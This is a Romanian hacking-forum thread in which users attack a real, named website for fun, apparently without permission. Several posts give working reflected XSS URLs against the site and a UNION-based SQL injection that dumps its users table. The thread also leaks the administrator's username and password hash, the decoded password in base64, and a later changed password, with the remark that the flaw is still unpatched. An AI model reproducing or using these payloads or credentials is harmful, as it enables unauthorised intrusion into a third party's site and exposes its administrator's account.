Sega Posted February 18, 2012 Report Share Posted February 18, 2012 (edited) Target: www.nicepps.roCauta un xss in site-ul asta si posteaza o poza (ascunde detaliile).Exemplu: http://postimage.org/image/pn4ob6rzb/P.S: Nu e greu, just 4 fun Pana acum au gasit XSS-ul:JimmyKodRSSak4d3ablackboy[1337] Edited February 18, 2012 by Sega Quote Link to comment Share on other sites More sharing options...
Jimmy Posted February 18, 2012 Report Share Posted February 18, 2012 Quote Link to comment Share on other sites More sharing options...
malsploit Posted February 18, 2012 Report Share Posted February 18, 2012 Mai are ceva pe langa xss. Quote Link to comment Share on other sites More sharing options...
Sega Posted February 18, 2012 Author Report Share Posted February 18, 2012 (edited) Mai are ceva pe langa xss.Acum am vazut ca mai are si SQLI @ak4d3a ia vezi daca gasesti vreun XSS intr-o pagina .HTML Edited February 18, 2012 by Sega Quote Link to comment Share on other sites More sharing options...
blackboy-1337- Posted February 18, 2012 Report Share Posted February 18, 2012 http://imageshack.us/photo/my-images/259/lenep.jpg/ Quote Link to comment Share on other sites More sharing options...
SirGod Posted February 18, 2012 Report Share Posted February 18, 2012 Acum am vazut ca mai are si SQLI @ak4d3a ia vezi daca gasesti vreun XSS intr-o pagina .HTML Paginile alea "HTML" sunt defapt PHP-uri (URL Rewrite). In pagini HTML poti gasi doar DOM XSS, in cazul in care contin cod JavaScript vulnerabil. Quote Link to comment Share on other sites More sharing options...
Sega Posted February 18, 2012 Author Report Share Posted February 18, 2012 (edited) XSShttp://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.htmlhttp://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script>SQLIwww.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users--Admin : PassAlexB : 90ae07eadcbfc3934252980ed73885d5 (adica YWxleDc3Nw==)Login page: admin@SirGod nu e logic? Era interesant la acel xss daca il introduci in search box nu trece de filtru, daca il introduci direct in url (mai sus) trece de acel filtru.Puteti da T.C Edited February 18, 2012 by Sega Quote Link to comment Share on other sites More sharing options...
curiosul Posted February 18, 2012 Report Share Posted February 18, 2012 Usor... Quote Link to comment Share on other sites More sharing options...
SilviuSDS Posted February 18, 2012 Report Share Posted February 18, 2012 Quote Link to comment Share on other sites More sharing options...
Sega Posted February 18, 2012 Author Report Share Posted February 18, 2012 @curiosul unde vezi tu xss in poza ta? @silviu am postat deja rezolvarea Quote Link to comment Share on other sites More sharing options...
Guest expl0iter Posted February 18, 2012 Report Share Posted February 18, 2012 Daca asta e challenge, atunci alea ale lui pyth0ne ce mai sunt? Quote Link to comment Share on other sites More sharing options...
curiosul Posted February 18, 2012 Report Share Posted February 18, 2012 @sega am gasit xss, dar nu cred ca mai era cazul sa fac si poza, mi s-a parut mai interesant ce am postat...aHR0cDovL3d3dy5uaWNlcHBzLnJvL2NhdXRhLXBwcy1wcHQtdG9hdGUtY2F0ZWdvcmlpbGUtMC1xLSUzQ2lmcmFtZS8lMjAvb25sb2FkPWFsZXJ0JTI4L3hzcy8lMjklM0UlM0NpZnJhbWUlM0UtbS1vcmljZS1jdXZhbnQtcGFnLTEuaHRtbA== Quote Link to comment Share on other sites More sharing options...
jetus Posted February 18, 2012 Report Share Posted February 18, 2012 Prezentari PowerPoint (pps, pptx, ppt, ppsx) - Quote Link to comment Share on other sites More sharing options...
Sega Posted February 19, 2012 Author Report Share Posted February 19, 2012 (edited) XSShttp://www.nicepps.ro/cauta-pps-ppt-toate-categoriile-0-q-"><script>alert(1)</script>-m-orice-cuvant-pag-1.htmlhttp://www.nicepps.ro/index.php?action=felicitare&id=369'"><script>alert(1)</script>SQLIwww.nicepps.ro/index.php?action=details&id=2561 and 1=2 UNION SELECT 1,group_concat(user,0x2c20,password,0x2c20,email,0x3c62722f3e),3,4,5,6,7,8,9,10,11,12,13 FROM users--Admin : PassAlexB : 90ae07eadcbfc3934252980ed73885d5 (adica YWxleDc3Nw==)Login page: admin@SirGod nu e logic? Era interesant la acel xss daca il introduci in search box nu trece de filtru, daca il introduci direct in url (mai sus) trece de acel filtru.Puteti da T.CAm postat rezolvarea, la ce mai postati?L.E: adminul a schimbat parola, dar nu a rezolvat vulnerabilitatea noua parola: YW5hY29uZGEyNw== Edited February 19, 2012 by Sega Quote Link to comment Share on other sites More sharing options...
SilviuSDS Posted February 19, 2012 Report Share Posted February 19, 2012 @curiosul unde vezi tu xss in poza ta? @silviu am postat deja rezolvarea Nu am fost atent, am citit doar prima postare Quote Link to comment Share on other sites More sharing options...